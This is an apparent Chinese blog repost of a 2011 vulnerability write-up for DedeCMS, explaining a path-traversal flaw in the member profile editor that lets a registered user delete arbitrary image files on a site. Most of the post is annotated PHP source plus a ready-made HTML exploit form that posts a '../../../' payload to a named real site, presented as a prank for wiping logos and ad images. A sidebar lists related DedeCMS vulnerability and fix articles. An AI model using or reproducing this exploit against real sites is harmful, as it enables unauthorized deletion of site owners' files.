DEDECMS 会员任意删除文件漏洞

最新推荐文章于 2021-07-28 14:33:10 发布
最新推荐文章于 2021-07-28 14:33:10 发布
阅读量1.3k 收藏
点赞数
分类专栏: ccbz^漏洞整理 文章标签: input upload file action 扩展 user

发布日期:2011-01.25
发布作者:心灵

影响版本:DEDECMS
官方网站:http://www.dedecms.com

漏洞类型:设计缺陷
漏洞描述:

 

edit_fullinfo.php

if($dopost=='save') //edit_fullinfo.php?dopost=save 就来到这步了    {    $oldspacelogo=(empty($oldspacelogo))? "" : $oldspacelogo; //没有做任何过滤    $spacelogo=(empty($spacelogo))? "" : $spacelogo;    $pagesize=(empty($pagesize))? "" : $pagesize;    $sign=(empty($sign))? "" : $sign;    $spacenews =(empty($spacenews))? "" : $spacenews;    $spacename =(empty($spacename))? "" : $spacename;    $maxlength = $cfg_max_face * 1024;    $userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;    //$userdir就是当前用户ID的图片文件夹 例如 uploads/userup/4/    if(!ereg('^'.$userdir, $oldspacelogo)) //这里绕过简单得很 uploads/userup/4/../../../ 既可绕过    {    $oldspacelogo = '';    }    if(is_uploaded_file($spacelogo)) //这里要一定随便一个文件图片文件上传    {    if(@filesize($_FILES['spacelogo']['tmp_name']) > $maxlength)    {    howMsg("你上传的Logo文件超过了系统限制大小:{$cfg_max_face} K!", '-1');    exit();    } //这里是检测图片大小 你找一个1KB的就行了    //删除旧图片(防止文件扩展名不同,如:原来的是gif,后来的是jpg) 这短话是官方留下的    if(eregi("/.(jpg|gif|png)$", $oldspacelogo) && file_exists($cfg_basedir.$oldspacelogo))    {    //由于这里不能被绕过 所以只能删除网站所有的JPG GIF PNG这样后缀的文件 所以才叫恶作剧    @unlink($cfg_basedir.$oldspacelogo)    }   EXP

<form id="frmUpload" enctype="multipart/form-data" action="http://www.t00ls.net/member/edit_space_info.php" method="post" name="spacelogo">    Upload a new file:    <input type="file" name="spacelogo" size="50" id="spacelogo" value="spacelogo">    <label>    <input name="dopost" type="text" value="save" />    </label>    <label>    <input name="oldspacelogo" type="text" value="/uploads/userup/111/../../../sb/11.jpg" />    //uploads/userup/111/ 这个路径自己上传一张图片后就能获得 /sb/11.jpg 为要删除图片的路径 这里很简单 不明白的拿块豆腐砸死自己自杀把    </label>    <label>    <input name="spacename" type="text" value="t00ls" />    </label>    <label>    <input name="pagesize" type="text" value="10" />    </label>    <input id="spacelogo" type="submit" value="Upload" >    </form>   哈 这样就能删除网站任何的JPG GIF PNG格式文件 恶作剧就是把LOGO删除了 或者某些广告图片删除 等管理员模糊

 

hkccbz
关注
专栏目录
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
阿里云提示织梦DedeCMS v5.7 注册用户任意文件删除漏洞
PHP错误汇总
12-27 208
阿里云服务器提示织梦DedeCMS v5.7 注册用户任意文件删除漏洞,今天秀站网技术讲解下解决办法。 漏洞简介:dedecms前台任意文件删除(需要会员中心),发表文章处,对于编辑文章的时候图片参数处理不当,导致了任意文件删除漏洞文件:/member/inc/archives_check_edit.php 漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。 修复方法: 打开/member/inc/archives_check_edit.php 找到大概第92行的代码: .
DeDecms任意用户登录,管理员密码重置漏洞
鸥鹭忘机
07-28 3891
基本信息 漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2 下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz 参考文章:https://www.seebug.org/vuldb/ssvid-97074 前置知识 如果要把一个key存储到cookie中,织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时,将key进行加密后与传来的加密k
DedeCMS v5.7 注册用户任意文件删除漏洞 /member/inc/archives_check_edit.php
qq_31763129的博客
04-26 2047
漏洞名称:DedeCMS v5.7 注册用户任意文件删除漏洞  危险等级:★★★★★(高危)  漏洞文件:/member/inc/archives_check_edit.php  披露时间:2017-03-20  漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。  修复方法:  打开/member/inc/archives_check_edit.php  找到大概第92行的代码:$litpic...
DedeCMS v5.7 注册用户任意文件删除漏洞 /member/inc/archives_check_edit.php
kakashs
01-15 631
漏洞名称:DedeCMS v5.7 注册用户任意文件删除漏洞 危险等级:★★★★★(高危) 漏洞文件:/member/inc/archives_check_edit.php 披露时间:2017-03-20 漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。 修复方法: 打开/member/inc/archives_check_edit.php 找到大概第92行的代码: $litpic =$old...
DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
热门推荐
3569
01-11 1万+
http://docs.ioin.in/writeup/xianzhi.aliyun.com/_forum_topic_1926/index.html DeDecms(织梦CMS) V5.7.72 正式版20180109 (最新版) 由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击 导致了远程攻击者可以在前台会员中心绕过
DedeCMS 存储型xss漏洞1
08-03
在本文中,我们将深入探讨一个特定的存储型 XSS(跨站脚本)漏洞,该漏洞存在于DedeCMS会员功能组件 `shops_delivery.php` 中的 `des` 参数。 ### 漏洞概述 这个存储型 XSS 漏洞允许攻击者通过注入恶意脚本到 `...
DeDeCMS前台任意用户密码修改漏洞复现.pdf
12-16
在本文档中,我们关注的是一个特定的安全漏洞,即DeDeCMS前台任意用户密码修改漏洞,该漏洞允许攻击者在满足特定条件的情况下,无需知道用户的安全问题就能重置任意用户的密码。 该漏洞首先被Seebug漏洞平台收录,...
wLHK-Dedecms漏洞整理.pdf
09-20
从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞的整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第一个漏洞,即Dedecms /...
DEDE漏洞利用EXP
06-06
DEDE的EXP利用工具和教程。教程里面有详细的解说。
利用安全狗防护DedeCMS v5.7高危注入漏洞 [复制链接]
IT技术宅-北方的刀郎
03-21 8365
漏洞修复版本:DedeCMS v5.7 20130607之后版本http://bbs.safedog.cn/thread-52264-1-1.html       漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。       漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两
dedecms会员中心mtypes.php注入漏洞修复方法
kakashs
01-15 1060
路径:/member/mtypes.php编辑mtypes.php,找到如下代码: elseif ($dopost == 'save') { if(isset($mtypeidarr) &amp;&amp; is_array($mtypeidarr)) { $delids = '0'; $mtypeidarr = array_filter($mtyp...
织梦dedecms后台文件media_add.php任意上传漏洞解决办法
qq_31763129的博客
04-26 3070
织梦在安装到阿里云服务器后阿里云后台会提示media_add.php后台文件任意上传漏洞,引起的文件是后台管理目录下的media_add.php文件,下面跟大家分享一下这个漏洞的修复方法: 首先找到并打开后台管理目录下的media_add.php文件,在里面找到如下代码: 1$fullfilename = $cfg_basedir.$filename;在其上面添加一段如下代码:         1...
阿里云ECS漏洞处理(Web-CMS漏洞):DedeCMS v5.7 注册用户任意文件删除漏洞
qq_42559887的博客
12-18 209
影响说明 路径:/member/inc/archives_check_edit.php 漏洞描述:注册会员用户可利用此漏洞任意删除网站文件 解决方法 1 打开/member/inc/archives_check_edit.php,找到大概第92行的代码: $litpic =$oldlitpic; 修改为: $litpic =$oldlitpic; if (strpos( $litpic, '.....
Dedecms会员中心注入漏洞
weixin_33721344的博客
03-30 578
详细说明: member/buy_action.php   require_once(dirname(__FILE__)."/config.php");   CheckRank(0,0);   $menutype = 'mydede';   $menutype_son = 'op';   require_once DEDEINC.'/dedetemplate.class.ph...
dedecms5.7 sp2前台修改任意用户密码漏洞(复现)
一个安全研究员
07-10 8278
如题
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4331
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
dedecms文件上传漏洞有哪些
最新发布
05-16
DedeCMS文件上传漏洞主要有以下几种: 1. 文件类型检查漏洞DedeCMS 在上传文件时,只做了文件扩展名的检查,而没有检查文件的真实类型,导致攻击者可以通过伪装文件类型的方式来上传恶意文件。 2. 目录遍历...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值